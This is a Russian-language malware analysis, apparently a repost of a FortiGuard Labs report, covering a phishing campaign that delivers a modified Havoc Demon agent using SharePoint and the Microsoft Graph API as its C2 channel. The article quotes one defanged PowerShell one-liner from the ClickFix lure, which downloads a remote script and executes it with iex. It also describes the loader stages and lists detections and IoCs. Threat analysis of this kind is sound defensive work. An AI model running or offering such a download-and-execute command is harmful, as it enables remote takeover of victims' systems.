Атака через модифицированный Havoc Demon: новая угроза для Windows

Обзор угрозы​

Платформы: Microsoft Windows
Целевые жертвы: Организации любого масштаба
Уровень угрозы: Высокий
Последствия: Полный контроль над зараженными системами


Havoc — это мощный фреймворк командно-контрольного (C2) сервера, используемый для удалённого управления заражёнными системами. Подобно другим известным C2-фреймворкам, таким как Cobalt Strike, Silver и Winos4.0, Havoc применяется в атаках для полного захвата целей. Более того, он является открытым исходным кодом и доступен на GitHub, что позволяет злоумышленникам модифицировать его для обхода систем обнаружения.

Недавняя фишинговая кампания​

FortiGuard Labs обнаружили фишинговую атаку, в которой используется ClickFix и многоступенчатое вредоносное ПО для доставки модифицированного агента Havoc Demon. Каждая стадия вредоносного ПО скрыта за сайтом SharePoint, а изменённый Havoc Demon применяет Microsoft Graph API для сокрытия C2-коммуникаций в легитимных сервисах.

Начальный доступ​

Атака начинается с фишингового письма, которое содержит HTML-вложение. Оно использует краткое объяснение и срочный тон, чтобы убедить жертву открыть файл.

HTML-файл Documents.html использует технику ClickFix, отображая поддельное сообщение об ошибке и инструкции, побуждающие пользователя вручную ввести вредоносную команду PowerShell.

Декодирование base64-строки показывает команду PowerShell, которая загружает и выполняет удалённый скрипт:

powershell -w h -c "iwr ‘hxxps://hao771[.]sharepoint.com/_layouts/15/download.aspx?share=EU7smZuKo-pDixZ26BSAaX0BVVcF5VkOc7qEvjsDSAH9OQ'|iex"

Этот скрипт размещён в SharePoint и контролируется злоумышленником. При запуске он проверяет, не выполняется ли код в песочнице, удаляет определённые записи реестра и оставляет маркер заражения.

Загрузка и выполнение вредоносного Python-скрипта​

Если в системе отсутствует pythonw.exe, скрипт загружает интерпретатор Python. Затем запускается удалённый Python-скрипт в скрытом режиме, чтобы замаскировать вредоносную активность.

Этот Python-скрипт, загруженный с того же SharePoint, содержит отладочные сообщения на русском языке и выполняет загрузку шеллкода.

При тестовом запуске в терминале лог отобразил следующие этапы:

• "Выделение памяти" (memory allocation)
• "Запись в память" (write to memory)
• "Выполнение shellcode" (execution of shellcode)
• "Завершение выполнения скрипта" (script execution completion)

KaynLdr: загрузчик шеллкода​

KaynLdr — это загрузчик шеллкода с GitHub, позволяющий загружать DLL-файл в память без записи на диск. Он использует API-хеширование на основе модифицированного алгоритма DJB2 и системные API ntdll для выделения памяти.

Модифицированный Havoc Demon​

Havoc Demon — это модифицированный агент, использующий Microsoft Graph API для маскировки C2-коммуникаций.

DLL начинается с функции DemonInit, которая использует тот же алгоритм хеширования API, что и KaynLdr.

Следующая функция SharePointC2Init создаёт файлы на SharePoint злоумышленников через Microsoft Graph API.

Она отправляет POST-запрос к /token для получения токенов доступа, а затем использует их для создания двух файлов в корневой папке SharePoint.

Файлы именуются по принципу:
{VictimID}pD9-tKout
{VictimID}pD9-tKin

Эти файлы используются для управления жертвой через SharePoint.

Первый пакет, отправленный на C2, содержит собранные данные о системе, включая имя хоста, домен, IP-адрес, учетную запись пользователя, список процессов и конфигурацию Havoc Demon DLL.

Перед отправкой данные шифруются по алгоритму AES-256 (CTR) и отправляются через функцию TransportSend.

Модифицированная TransportSend обновляет содержимое файла {VictimID}pD9-tKout, затем получает ответ через {VictimID}pD9-tKin с использованием метода GET. После успешного получения ответа файл {VictimID}pD9-tKin немедленно очищается.

Если полученные данные совпадают с AgentID, соединение устанавливается, и агент ожидает новые команды.

Команды аналогичны тем, что используются в Havoc GitHub. Они позволяют собирать информацию, выполнять команды и загружать вредоносные файлы.

Выводы​

Помимо внимательности к фишинговым письмам, следует с особой осторожностью относиться к сообщениям, побуждающим вводить команды в терминале или PowerShell.

В данной статье мы рассмотрели механизм выполнения атаки и модификацию Havoc Demon. Использование легитимных облачных сервисов, таких как Microsoft Graph API, затрудняет обнаружение вредоносной активности.

Защита Fortinet​

Fortinet выявляет и блокирует следующее вредоносное ПО:

• HTML/Agent.A5D4!tr
• PowerShell/MalwThreat!ebc5FT
• Python/Agent.DF60!tr
• W64/Havoc.L!tr

Дополнительно FortiGuard IPS содержит сигнатуру Backdoor.Havoc.Agent для блокировки сетевых коммуникаций Havoc C2.

Если ваша организация столкнулась с данной угрозой, рекомендуется обратиться в FortiGuard Incident Response Team.

IoC (Индикаторы компрометации)​

C2:

• hao771[.]sharepoint.com

Файлы:

• 51796effe230d9eca8ec33eb17de9c27e9e96ab52e788e3a9965528be2902330
• 989f58c86343704f143c0d9e16893fad98843b932740b113e8b2f8376859d2dd

Источник